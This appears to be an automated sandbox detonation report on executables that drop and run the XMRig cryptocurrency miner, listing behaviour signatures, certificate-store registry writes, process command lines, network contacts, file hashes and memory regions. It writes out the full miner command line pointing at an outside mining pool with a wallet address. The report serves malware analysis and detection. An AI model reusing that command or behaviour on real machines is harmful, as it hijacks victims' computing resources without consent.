N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 16.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/3996-14-0x000001EF7CD60000-0x000001EF7CD80000-memory.dmp

memory/3996-15-0x000001EF7CDB0000-0x000001EF7CDD0000-memory.dmp

memory/3996-16-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-17-0x000001EF7CDD0000-0x000001EF7CDF0000-memory.dmp

memory/3996-18-0x000001EF7CDF0000-0x000001EF7CE10000-memory.dmp

memory/3996-19-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-20-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-23-0x000001EF7CDF0000-0x000001EF7CE10000-memory.dmp

memory/3996-22-0x000001EF7CDD0000-0x000001EF7CDF0000-memory.dmp

memory/3996-21-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-24-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-25-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-26-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-27-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-28-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-29-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-30-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-31-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-32-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-33-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-34-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-35-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-36-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-37-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-38-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-39-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-40-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-41-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-42-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-43-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-44-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-45-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-46-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-47-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-48-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-49-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-50-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-51-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-52-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-53-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-54-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-55-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-56-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-57-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-58-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-59-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-60-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-61-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-62-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-63-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-64-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-65-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-66-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-67-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-68-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-69-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-70-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-71-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-72-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-73-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-74-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-75-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-76-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-77-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-78-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-79-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-80-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-81-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

memory/3996-82-0x00007FF7A2820000-0x00007FF7A3323000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-06-14 05:12

Reported

2024-06-14 06:39

Platform

win10v2004-20240611-en

Max time kernel

1793s

Max time network

1799s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4212,i,11751898164297348119,13021661521765644467,262144 --variations-seed-version --mojo-platform-channel-handle=4120 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4964,i,11751898164297348119,13021661521765644467,262144 --variations-seed-version --mojo-platform-channel-handle=3576 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 13.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 68.242.123.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/4580-14-0x000001755A630000-0x000001755A650000-memory.dmp

memory/4580-15-0x00000175EE1B0000-0x00000175EE1D0000-memory.dmp

memory/4580-16-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-17-0x00000175EE820000-0x00000175EE840000-memory.dmp

memory/4580-18-0x00000175EE800000-0x00000175EE820000-memory.dmp

memory/4580-19-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-20-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-21-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-23-0x00000175EE800000-0x00000175EE820000-memory.dmp

memory/4580-22-0x00000175EE820000-0x00000175EE840000-memory.dmp

memory/4580-24-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-25-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-26-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-27-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-28-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-29-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-30-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-31-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-32-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-33-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-34-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

